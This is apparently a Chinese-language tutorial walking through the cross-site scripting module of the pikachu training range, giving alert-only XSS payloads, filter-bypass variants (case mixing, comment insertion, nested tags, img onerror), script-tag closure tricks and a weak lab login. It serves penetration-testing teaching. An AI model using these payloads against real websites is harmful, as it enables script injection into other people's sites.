pikachu靶机-Cross-Site Scripting(XSS)

++本篇文章旨在为网络安全渗透测试靶机复现教学。通过阅读本文,读者将能够对渗透pikachu靶场XSS跨站脚本攻击模块有一定的了解++

原文学习链接

CSDN博主:One_Blanks

主页地址:https://blog.csdn.net/NPSM_?type=blog

一、靶机资源下载

PHPStudy:

https://www.xp.cn/php-study

pikachu:

https://github.com/zhuifengshaonianhanlu/pikachu

二、反射型XSS(get)

1.1 提交框插入XSS检测代码

复制代码
# xss口令:见框就插
<script>alert("XSS")</script>

1.2 burp suite抓包并找到传参点

1.3 burp suite改包后发送数据包,查看浏览器执行结果

1.4 方法二:修改前端输入框长度限制

三、反射型XSS(post)

1.1 爆破登录框

复制代码
username=admin
password=123456

1.2 插入XSS检测代码

复制代码
<script>alert("XSS")</script>

四、存储型XSS

复制代码
<script>alert("XSS")</script>

五、DOM型XSS

复制代码
# DOM型就是将XSS输入到标签属性中了,利用标签属性进行触发
javascript:alert(23)

六、DOM型xss-x

复制代码
# DOM型就是将XSS输入到标签属性中了,利用属性进行触发
javascript:alert(23)

七、XSS盲打

1.1 插入XSS检测代码

复制代码
<script>alert("xss")</script> 

1.2 查看提示

1.3 根据提示进入登陆地址

复制代码
http://192.168.60.181/pikachu/vul/xss/xssblind/admin_login.php
#根据自己靶机IP地址更换下IP

八、xss过滤

1.1 输入框输入XSS检测代码

复制代码
<script>alert("xss")</script>

1.2 使用其他XSS检测代码尝试

复制代码
大小写混淆过滤,<scRipt>alert(14)</sCript>
使用注释进行干扰: <sc<!--test--> ript> alert(14)</scr <--test--> ipt>
重写: <scri<script> pt> alert(14)</scri</script> pt>
使用img标签<img src=xss onerror="alert(11)">

九、 xss之htmlspecialchars

1.1 输入框输入XSS检测代码

复制代码
<script>alert("xss")</script>

1.2 重新构造XSS检测代码

复制代码
# htmlspecialchars()函数把预定义的字符转换为HTML实体
# &(和号)成为&
# "(双引号)成为"
# '(单引号)成为'
# <(小于)成为<
# '>'(大于)成为>
javascript:alert("XSS")

十、xss之href输出

复制代码
javascript:alert("XSS")

十一、xss之js输出

1.1 插入xss检测代码

复制代码
<script>alert(1)</script>

1.2 重构xss检测语句

复制代码
</script><script>alert(1)</script>
# 前面多写一个</script>与网站代码中的<script>形成闭合,再去执行我们的<script>alert(xss)</script>
相关推荐
运维行者_2 小时前
企业无线网络监控的挑战与智能化演进趋势
大数据·运维·服务器·网络·数据库
Coder_Shenshen4 小时前
西门子S7CommPlus协议鉴权算法原理与流程详解
网络·后端·算法
HavenlonLabs7 小时前
Havenlon 对抗性完整(十七):安全不是“防住攻击”,而是控制失败方式
网络·人工智能·架构·安全威胁分析·安全架构·havenlon
fei_sun7 小时前
路径MTU发现
linux·运维·网络
tachibana29 小时前
hot100 回文链表(234)
java·网络·数据结构·leetcode·链表
从零开始的代码生活_10 小时前
NAT、代理服务与内网穿透详解
linux·服务器·网络·c++·http·智能路由器
云栖梦泽在10 小时前
Claude Code / Codex 使用卡顿怎么办?AI 编程 Agent 连接失败与网络排查思路
网络·人工智能·网络协议·chatgpt·性能优化
Jeremy_WW10 小时前
QSFP-DD MSA Hardware协议解读(二)
网络·模块测试·智能硬件
深盾科技_Virbox10 小时前
加密狗授权能力选型:从授权模型到全生命周期管理
java·网络·数据库
运维管理11 小时前
H3C SecPath W2000-G[AK]系列Web应用防火墙 典型配置举例(E6711 E6712 E6713)-6W108-H3C 官方配置
服务器·网络·php